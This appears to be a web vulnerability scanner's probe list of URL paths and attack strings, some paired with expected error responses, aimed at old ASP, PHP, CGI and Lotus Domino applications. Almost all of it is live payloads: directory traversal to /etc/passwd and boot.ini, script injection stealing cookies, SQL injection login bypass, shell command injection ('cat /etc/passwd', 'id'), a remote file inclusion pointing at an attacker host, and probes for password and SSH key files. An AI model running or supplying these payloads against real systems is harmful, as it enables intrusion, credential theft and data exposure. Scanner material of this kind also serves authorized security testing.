+forum1.asp?n=1753&nn=/....../boot.ini +forum1.asp?n=1753&nn=/..../boot.ini +forum1.asp?n=1753&nn=/../../../../../../../../../../../../../../../../../../../../boot.ini +forum1.asp?n=1753&nn=/.\"./.\"./.\"./.\"./.\"./boot.ini +forum1.asp?n=1753&nn=/etc/passwd +forum1.asp?n=1753&nn=/etc/passwd%00 +forum1.asp?n=1753&nn=c:\boot.ini +forum1.asp?n=c:\boot.ini&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1_professionnel.asp?n=%60/etc/passwd%60&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requi +forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_curren +forum1_professionnel.asp?n=/....../boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_recor +forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requeste +forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_rec +forum1_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_reco +forum1_professionnel.asp?n=/etc/passwd%00&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1_professionnel.asp?n=/etc/passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum1_professionnel.asp?n=1771&nn=%60/etc/passwd%60&page=1 +forum1_professionnel.asp?n=1771&nn=....//....//....//....//....//....//....//etc.passwd&page=1 +forum1_professionnel.asp?n=1771&nn=../../../../../../../../../etc/passwd%00&page=1 +forum1_professionnel.asp?n=1771&nn=/....../boot.ini&page=1 +forum1_professionnel.asp?n=1771&nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&page=1 +forum1_professionnel.asp?n=1771&nn=/../../../../../../../../etc/passwd&page=1 +forum1_professionnel.asp?n=1771&nn=/.\"./.\"./.\"./.\"./.\"./boot.ini&page=1 +forum1_professionnel.asp?n=1771&nn=/etc/passwd%00&page=1 +forum1_professionnel.asp?n=1771&nn=/etc/passwd&page=1 +forum1_professionnel.asp?n=1771&nn=100&page=%60/etc/passwd%60 +forum1_professionnel.asp?n=1771&nn=100&page=....//....//....//....//....//....//....//etc.passwd +forum1_professionnel.asp?n=1771&nn=100&page=../../../../../../../../../etc/passwd%00 +forum1_professionnel.asp?n=1771&nn=100&page=/....../boot.ini +forum1_professionnel.asp?n=1771&nn=100&page=/..../boot.ini +forum1_professionnel.asp?n=1771&nn=100&page=/.../.../.../.../.../.../boot.ini +forum1_professionnel.asp?n=1771&nn=100&page=/../../../../../../../../../../../../../../../../../../../../boot.ini +forum1_professionnel.asp?n=1771&nn=100&page=/../../../../../../../../../../etc/passwd +forum1_professionnel.asp?n=1771&nn=100&page=/.\"./.\"./.\"./.\"./.\"./boot.ini +forum1_professionnel.asp?n=1771&nn=100&page=/etc/passwd +forum1_professionnel.asp?n=1771&nn=100&page=/etc/passwd%00 +forum1_professionnel.asp?n=1771&nn=100&page=c:\boot.ini +forum1_professionnel.asp?n=1771&nn=c:\boot.ini&page=1 +forum1_professionnel.asp?n=c:\boot.ini&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record. +forum_arc.asp?n=%60/etc/passwd%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'. +forum_arc.asp?n=../../../../../../../../../etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_arc.asp?n=/....../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_arc.asp?n=/.../.../.../.../.../.../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_arc.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_arc.asp?n=/../../../../../../../../etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_arc.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_arc.asp?n=/etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_arc.asp?n=/etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_arc.asp?n=268 +forum_arc.asp?n=c:\boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'. +forum_professionnel.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'. +forum_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_professionnel.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_professionnel.asp?n=/.../.../.../.../.../.../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_professionnel.asp?n=/../../../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_professionnel.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +forum_professionnel.asp?n=100 +forum_professionnel.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'. +functions.inc.php+ +get_od_toc.pl +globals.php3 +globals.pl +Gozila.cgi +helperfunction.php +homebet/homebet.dll?form=menu&option=menu-signin +htmltonuke.php +idealbb/error.asp?|-|0|404_Object_Not_Found +iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found +imprimer.asp?no=%60/etc/passwd%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'. +imprimer.asp?no=....//....//....//....//....//....//....//etc.passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +imprimer.asp?no=../../../../../../../../../etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +imprimer.asp?no=/....../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +imprimer.asp?no=/.../.../.../.../.../.../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +imprimer.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +imprimer.asp?no=/../../../../../../../../etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +imprimer.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +imprimer.asp?no=/etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +imprimer.asp?no=c:\boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'. +include/customize.php +include/help.php +includes/footer.php3 +includes/header.php3 +index.php?base=test%20 +index.php?IDAdmin=test +index.php?pymembs=admin +index.php?SqlQuery=test%20 +index.php?tampon=test%20 +index.php?topic=&lt;script&gt;alert(document.cookie)&lt;/script&gt;%20 +infos/contact/index.asp +infos/faq/index.asp +infos/gen/index.asp +infos/services/index.asp +instaboard/index.cfm +intranet/browse.php +invitefriends.php3 +ipchat.php +ixmail_netattach.php +jsptest.jsp+ +kernel/class/delete.php +kernel/classes/ezrole.php +ldap.search.php3?ldap_serv=nonsense%20 +livredor/index.php +login.php3?reason=chpass2%20 +mail/include.html +mail/settings.html +mail/src/read_body.php +mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd +mambo/banners.php +manage/login.asp+ +mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F +members/ID.pm +members/ID.xbb +mod.php +modif/delete.php +modif/ident.php +modif_infos.asp?n=%60/etc/passwd%60 +modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd +modif_infos.asp?n=../../../../../../../../../etc/passwd%00 +modif_infos.asp?n=/....../boot.ini +modif_infos.asp?n=/.../.../.../.../.../.../boot.ini +modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini +modif_infos.asp?n=/../../../../../../../../../etc/passwd +modif_infos.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini +modif_infos.asp?n=/etc/passwd +modif_infos.asp?n=/etc/passwd%00 +modif_infos.asp?n=c:\boot.ini +modules/Downloads/voteinclude.php+ +modules/Forums/attachment.php +modules/Search/index.php +modules/WebChat/in.php+ +modules/WebChat/out.php +modules/WebChat/quit.php +modules/WebChat/users.php +modules/Your_Account/navbar.php+ +moregroupware/modules/webmail2/inc/ +msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found +myguestBk/add1.asp?|-|0|404_Object_Not_Found +myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found +myguestBk/admin/index.asp?|-|0|404_Object_Not_Found +netget?sid=Safety&msg=2002&file=Safety +newtopic.php +nphp/nphpd.php +OpenTopic +options.inc.php+ +oscommerce/default.php +parse_xml.cgi +php/gaestebuch/admin/index.php +php/php4ts.dll +pks/lookup +pm/lib.inc.php +poppassd.php3+ +produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found +productcart/database/EIPC.mdb +productcart/pc/Custva.asp?|-|0|404_Object_Not_Found +ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found +product_info.php +prometheus-all/index.php +proplus/admin/login.php+-d+\"action=insert\"+-d+\"username=test\"+-d+\"password=test\" +protected/ +protected/secret.html+ +protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''=' +protection.php +pt_config.inc +pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4=bad%20 +pvote/del.php?pollorder=1%20 +quikmail/nph-emumail.cgi?type=../%00 +room/save_item.php +rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'. +rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +rubrique.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. +rubrique.asp?no=c:\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'. +screen.php +scripts/tradecli.dll +scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir +security/web_access.html +sendphoto.php +servers/link.cgi +setpasswd.cgi +shop/php_files/site.config.php+ +shop/search.php +shop/show.php +shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20 +Site/biztalkhttpreceive.dll +site_searcher.cgi +spelling.php3+ +squirrelmail/src/read_body.php +staticpages/index.php +status.php3 +supporter/index.php +supporter/tupdate.php +sw000.asp?|-|0|404_Object_Not_Found +syslog.htm?%20 +technote/print.cgi +texis/websearch/phine +tinymsg.php +tmp_view.php?file=/etc/passwd +topic/entete.php +topsitesdir/edit.php +ttforum/index.php +tutos/file/file_new.php +tutos/file/file_select.php +typo3/typo3/dev/translations.php +uifc/MultFileUploadHandler.php+ +url.jsp +useraction.php3 +userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd +utils/sprc.asp+ +vars.inc+ +VBZooM/add-subject.php +wbboard/profile.php +wbboard/reply.php +webcalendar/login.php +webcalendar/view_m.php +webmail/lib/emailreader_execute_on_each_page.inc.php +webmail/src/read_body.php +web_app/WEB-INF/webapp.properties +XMBforum/buddy.php +XMBforum/member.php +x_stat_admin.php +yabbse/Reminder.php +yabbse/Sources/Packages.php +zentrack/index.php +_head.php +cgi-bin/adduser.cgi +cgi-bin/amadmin.pl +cgi-bin/anyboard.cgi +cgi-bin/AT-generate.cgi +cgi-bin/auctiondeluxe/auction.pl +cgi-bin/awl/auctionweaver.pl +cgi-bin/bb-ack.sh +cgi-bin/bb-histlog.sh +cgi-bin/bb-rep.sh +cgi-bin/bb-replog.sh +cgi-bin/bbs_forum.cgi +cgi-bin/build.cgi +cgi-bin/bulk/bulk.cgi +cgi-bin/cached_feed.cgi +cgi-bin/calender_admin.pl +cgi-bin/cartmanager.cgi +cgi-bin/cbmc/forums.cgi +cgi-bin/cgforum.cgi +cgi-bin/change-your-password.pl +cgi-bin/clickresponder.pl +cgi-bin/commandit.cgi +cgi-bin/counter-ord +cgi-bin/counterbanner +cgi-bin/counterbanner-ord +cgi-bin/counterfiglet-ord +cgi-bin/counterfiglet/nc/ +cgi-bin/CSMailto.cgi +cgi-bin/CSMailto/CSMailto.cgi +cgi-bin/csNews.cgi +cgi-bin/csPassword.cgi +cgi-bin/csPassword/csPassword.cgi +cgi-bin/cutecast/members/ +cgi-bin/day5datanotifier.cgi +cgi-bin/db2www/library/document.d2w/show +cgi-bin/db_manager.cgi +cgi-bin/DCFORMS98.CGI +cgi-bin/dnewsweb +cgi-bin/donothing +cgi-bin/ezshopper2/loadpage.cgi +cgi-bin/ezshopper3/loadpage.cgi +cgi-bin/if/admin/nph-build.cgi +cgi-bin/ikonboard/help.cgi? +cgi-bin/imageFolio.cgi +cgi-bin/imagefolio/admin/admin.cgi +cgi-bin/journal.cgi?folder=journal.cgi%00 +cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd +cgi-bin/majordomo.pl +cgi-bin/mojo/mojo.cgi +cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a +cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK +cgi-bin/non-existent.pl +cgi-bin/nph-exploitscanget.cgi +cgi-bin/nph-maillist.pl +cgi-bin/parse-file +cgi-bin/php-cgi +cgi-bin/pollssi.cgi +cgi-bin/postcards.cgi +cgi-bin/profile.cgi +cgi-bin/quikstore.cfg +cgi-bin/register.cgi +cgi-bin/replicator/webpage.cgi/ +cgi-bin/rightfax/fuwww.dll/? +cgi-bin/rmp_query +cgi-bin/robpoll.cgi +cgi-bin/scripts/*%0a.pl +cgi-bin/simplestguest.cgi +cgi-bin/simplestmail.cgi +cgi-bin/statusconfig.pl +cgi-bin/sws/manager.pl +cgi-bin/texis/phine +cgi-bin/Upload.pl +cgi-bin/utm/admin +cgi-bin/utm/utm_stat +ows-bin/oaskill.exe?abcde.exe +ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah +cgi-bin//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15 +cgi-bin//_vti_pvt/doctodep.btr +cgi-bin/cfgwiz.exe +cgi-bin/Cgitest.exe +cgi-bin/mailform.exe +cgi-bin/ms_proxy_auth_query/ +cgi-bin/post16.exe +oem_webstage/oem.conf +database/ +demo/sql/index.jsp +cgi-bin/.htaccess +cgi-bin/.htaccess.old +cgi-bin/.htaccess.save +cgi-bin/.htaccess~ +cgi-bin/.htpasswd +cgi-bin/.passwd +.wwwacl +.www_acl +cgi-bin/.wwwacl +cgi-bin/.www_acl +.htpasswd +.access +.addressbook +.bashrc +.bash_history +.forward +.history +.htaccess +.lynx_cookies +.mysql_history +.passwd +.pinerc +.plan +.proclog +.procmailrc +.profile +.rhosts +.sh_history +.ssh +.ssh/authorized_keys +.ssh/known_hosts +cgi-bin/ls +///../../data/config/microsrv.cfg +///////../../../../../../etc/passwd +_vti_bin/shtml.exe/_vti_rpc +doc/rt/overview-summary.html +docs/sdb/en/html/index.html +jservdocs/ +test/jsp/buffer1.jsp +test/jsp/buffer2.jsp +test/jsp/buffer3.jsp +test/jsp/buffer4.jsp +test/jsp/declaration/IntegerOverflow.jsp +test/jsp/extends1.jsp +test/jsp/extends2.jsp +test/jsp/Language.jsp +test/jsp/pageAutoFlush.jsp +test/jsp/pageDouble.jsp +test/jsp/pageExtends.jsp +test/jsp/pageImport2.jsp +test/jsp/pageInfo.jsp +test/jsp/pageInvalid.jsp +test/jsp/pageIsErrorPage.jsp +test/jsp/pageIsThreadSafe.jsp +test/jsp/pageSession.jsp +test/realPath.jsp +tomcat-docs/index.html +cgi-bin/test-cgi.bat +akopia/ +bc4j.html +dms0 +jspdocs/ +mod_ose_docs +ojspdemos/basic/hellouser/hellouser.jsp +ojspdemos/basic/simple/usebean.jsp +ojspdemos/basic/simple/welcomeuser.jsp +oprocmgr-status +php/index.php +pls/portal30/admin_/ +pls/simpledad/admin_/ +pls/simpledad/admin_/gateway.htm?schema=sample +pls/simpledad/admin_/globalsettings.htm +search/ +servlet/Counter +servlet/DateServlet +servlet/FingerServlet +servlet/HelloWorldServlet +servlet/IsItWorking +servlet/SessionServlet +servlet/SimpleServlet +servlet/SnoopServlet +xdk/ +xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS +admcgi/contents.htm +admcgi/scripts/Fpadmcgi.exe +admisapi/fpadmin.htm +bin/admin.pl +bin/cfgwiz.exe +bin/CGImail.exe +bin/contents.htm +bin/fpadmin.htm +bin/fpremadm.exe +bin/fpsrvadm.exe +cgi-bin/admin.pl +cgi-bin/cfgwiz.exe +cgi-bin/CGImail.exe +cgi-bin/contents.htm +cgi-bin/fpadmin.htm +cgi-bin/fpremadm.exe +cgi-bin/fpsrvadm.exe +scripts/admin.pl +scripts/cfgwiz.exe +scripts/CGImail.exe +scripts/contents.htm +scripts/fpadmin.htm +scripts/fpcount.exe +scripts/fpremadm.exe +scripts/fpsrvadm.exe +_private/ +_private/orders.htm +_private/orders.txt +_private/register.htm +_private/register.txt +_private/registrations.htm +_private/registrations.txt +_private/_vti_cnf/ +_vti_bin/ +_vti_bin/admin.pl +_vti_bin/cfgwiz.exe +_vti_bin/CGImail.exe +_vti_bin/contents.htm +_vti_bin/fpadmin.htm +_vti_bin/fpremadm.exe +_vti_bin/fpsrvadm.exe +_vti_bin/_vti_cnf/ +_vti_cnf/_vti_cnf/ +_vti_inf.html +_vti_log/_vti_cnf/ +_vti_pvt/administrators.pwd +_vti_pvt/authors.pwd +_vti_pvt/service.pwd +_vti_pvt/users.pwd +manual/servlets/scripts/servlet1/servform.htm +manual/servlets/scripts/shoes/shoeform.htm +examples/ +examples/context +examples/forward1 +examples/forward2 +examples/header +examples/include1 +examples/info +examples/jsp/index.html +help/contents.htm +help/home.html +manual/ag/esperfrm.htm +nethome/ +com/novell/gwmonitor/help/en/default.htm +com/novell/webaccess/help/en/default.htm +com/novell/webpublisher/help/en/default.htm +servlet/AdminServlet +servlet/gwmonitor +servlet/PrintServlet +servlet/SearchServlet +servlet/ServletManager +servlet/sq1cdsn +servlet/sqlcdsn +servlet/webacc +servlet/webpub +WebSphereSamples +cgi-bin/cgi-test.exe +doc/domguide.nsf +doc/dspug.nsf +doc/help4.nsf +doc/helpadmin.nsf +doc/helplt4.nsf +doc/internet.nsf +doc/javapg.nsf +doc/lccon.nsf +doc/migrate.nsf +doc/npn_admn.nsf +doc/npn_rn.nsf +doc/readmec.nsf +doc/readmes.nsf +doc/smhelp.nsf +doc/srvinst.nsf +domguide.nsf +dspug.nsf +help/domguide.nsf +help/dspug.nsf +help/help4.nsf +help/helpadmin.nsf +help/helplt4.nsf +help/internet.nsf +help/javapg.nsf +help/lccon.nsf +help/migrate.nsf +help/npn_admn.nsf +help/npn_rn.nsf +help/readmec.nsf +help/readmes.nsf +help/smhelp.nsf +help/srvinst.nsf +help4.nsf +helpadmin.nsf +helplt4.nsf +internet.nsf +javapg.nsf +lccon.nsf +migrate.nsf +npn_admn.nsf +npn_rn.nsf +readmec.nsf +readmes.nsf +smhelp.nsf +srvinst.nsf +lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse +lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse +netbasic/websinfo.bas +perl/env.pl +perl/samples/env.pl +perl/samples/lancgi.pl +perl/samples/ndslogin.pl +perl/samples/volscgi.pl +se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse +index.html.ca +index.html.cz.iso8859-2 +index.html.de +index.html.dk +index.html.ee +index.html.el +index.html.en +index.html.es +index.html.et +index.html.fr +index.html.he.iso8859-8 +index.html.hr.iso8859-2 +index.html.it +index.html.ja.iso2022-jp +index.html.kr.iso2022-kr +index.html.ltz.utf8 +index.html.lu.utf8 +index.html.nl +index.html.nn +index.html.no +index.html.po.iso8859-2 +index.html.pt +index.html.pt-br +index.html.ru.cp-1251 +index.html.ru.cp866 +index.html.ru.iso-ru +index.html.ru.koi8-r +index.html.ru.utf8 +index.html.se +index.html.tw +index.html.tw.Big5 +index.html.var +test +iissamples/issamples/codebrws.asp +iissamples/issamples/ixqlang.htm +iissamples/issamples/Winmsdp.exe +iissamples/sdk/asp/docs/codebrw2.asp +iissamples/sdk/asp/docs/codebrws.asp +iissamples/sdk/asp/docs/Winmsdp.exe +mc-icons/ +ns-icons/ +cgi-bin/printenv +cgi-bin/printenv +cgi-bin/test-cgi +cgi-bin/test-cgi +pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E +test.php +test/info.php +info.php +test/phpinfo.php +NetDetector/middle_help_intro.htm +a/ +basilix/ +bottom.html +interchange/ +sca/menu.jsp + +icons/ +manual/images/ +com +COM +doc/packages/ +image/ +javax +perl/ +scripts +SUNWmc/htdocs/en_US/ +search/inc/ +images/ +docs/ +examples/ +style/ +styles/ +forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script> +search.asp?Search=\"><script>alert(Vulnerable)</script> +uploader.php +iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp +iissamples/sdk/asp/docs/Winmsdp.exe +iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp +iissamples/exair/howitworks/Winmsdp.exe +%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini +%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini +conspass.chl+ +consport.chl+ +general.chl+ +srvstatus.chl+ +/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz +firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script> +antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0 +antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally) +theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session +theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\"><script>alert('Vulnerable')</script>,/system/status/session +theme1/selector?button=status,monitor,session&button_url=/system/status/status\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/status/session +theme1/selector?button=status,monitor,session\"><script>alert('Vulnerable')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session +search.asp?Search= +forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 +forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 +htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 +vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 +vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 +cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 +_vti_bin/ +NULL.printer +nul..cfm +nul..dbm +nul.cfm +nul.dbm +cgi-bin/imagemap +cgi-bin/imagemap.exe +cgi-bin/htimage.exe/path/filename?2,2 +cgi-bin/htimage.exe +mlog.html +mlog.phtml +mylog.html?screen=/etc/passwd +mylog.phtml?screen=/etc/passwd +php/mlog.html +php/mlog.phtml +php/mylog.html?screen=/etc/passwd +php/mylog.phtml?screen=/etc/passwd +i?/etc/passwd +cfide/administrator/index.cfm +CFIDE/administrator/index.cfm +cfide/administrator/index.cfm +CFIDE/administrator/index.cfm +directory.php?dir=%3Bcat%20/etc/passwd +content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd: +content/base/build/explorer/none.php?/etc/passwd +soapConfig.xml 